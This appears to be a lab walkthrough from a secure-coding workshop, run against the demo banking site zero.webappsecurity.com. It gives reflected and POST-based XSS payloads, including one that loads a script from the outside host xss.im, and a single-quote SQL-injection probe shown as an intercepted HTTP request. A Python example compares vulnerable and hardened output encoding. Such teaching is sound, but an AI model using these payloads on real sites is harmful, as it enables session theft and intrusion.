http://zero.webappsecurity.com
Username: username, Password: password
Basic XSS attempt. This fails because the reflected input is entity encoded, but the reflection is still exploitable because the value lands inside existing JavaScript rather than in HTML markup.
http://zero.webappsecurity.com/bank/account-activity.html?accountId=18132);</script><script>alert("Secure Coding Workshop")</script>;//992
Instead, change the injected payload so that it avoids the characters the entity encoding touches: no single or double quotes and no greater-than or less-than signs.
http://zero.webappsecurity.com/bank/account-activity.html?accountId=18132);alert(1234);//992
The above is a reflected XSS delivered via a GET request (the payload is in the URL). The following is a POST-based XSS.
Go to 'Transfer Money & Make Payments' and inject the following into the 'Description' field:
10"><script src=http://xss.im/xs.js></script><p "
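Both reflections above come down to output encoding chosen for the wrong context: entity encoding stops the Description payload in an HTML element context but does nothing to the accountId payload inside a script block. The following is an added Python example, not code from zero.webappsecurity.com, that puts the vulnerable rendering beside a hardened one and generalises past the page's integer case with a helper for string-valued script parameters; the loadActivity call, the render_* functions and js_string_literal are assumed names.

```python
import html
import json
import re

# Constructed inputs modelled on the two payloads from the notes above.
JS_CONTEXT_PAYLOAD = "18132);alert(1234);//992"
HTML_CONTEXT_PAYLOAD = '10"><script src=http://xss.im/xs.js></script><p "'


def render_activity_entity_encoded(account_id: str) -> str:
    """Vulnerable pattern: HTML entity encoding applied to a value that is
    written into a <script> block. Quotes and angle brackets are neutralised,
    but ')', ';' and '/' are not, so the payload still closes the intended
    call and appends its own statement."""
    return f"<script>loadActivity({html.escape(account_id)});</script>"


def render_activity_hardened(account_id: str) -> str:
    """Hardened: validate the type the parameter is supposed to have, then
    encode for the JavaScript context (JSON) rather than for HTML."""
    if not re.fullmatch(r"\d{1,12}", account_id):
        raise ValueError("accountId must be a decimal integer")
    return f"<script>loadActivity({json.dumps(int(account_id))});</script>"


def js_string_literal(value: str) -> str:
    """For parameters that really are strings: JSON-encode, then escape the
    characters that would let the literal terminate the surrounding
    <script> element or be reinterpreted as markup."""
    return (
        json.dumps(value)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


def render_description(description: str) -> str:
    """HTML element context: here entity encoding is the correct defence,
    and the Description payload is rendered as inert text."""
    return f"<td>{html.escape(description, quote=True)}</td>"


if __name__ == "__main__":
    print(render_activity_entity_encoded(JS_CONTEXT_PAYLOAD))  # breaks out
    print(render_description(HTML_CONTEXT_PAYLOAD))            # inert
    print(render_activity_hardened("18132"))
```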
Next, go to 'Pay Bills' -> 'Pay Saved Payee'.
The following URL is requested when you click the ? icon next to the payee; intercept it with your proxy.
http://zero.webappsecurity.com/bank/pay-bills-saved-payee.html
Add a single quote to the end of the posted payee name so the request looks something like this:
POST /bank/pay-bills-get-payee-details.html HTTP/1.1
Host: zero.webappsecurity.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://zero.webappsecurity.com/bank/pay-bills-saved-payee.html
Content-Length: 15
Cookie: JSESSIONID=AE22B6FC
Connection: close
payeeId=sprint'
In the proxy, open the HTTP history and inspect the response to that request; it contains the errors produced by the unbalanced quote.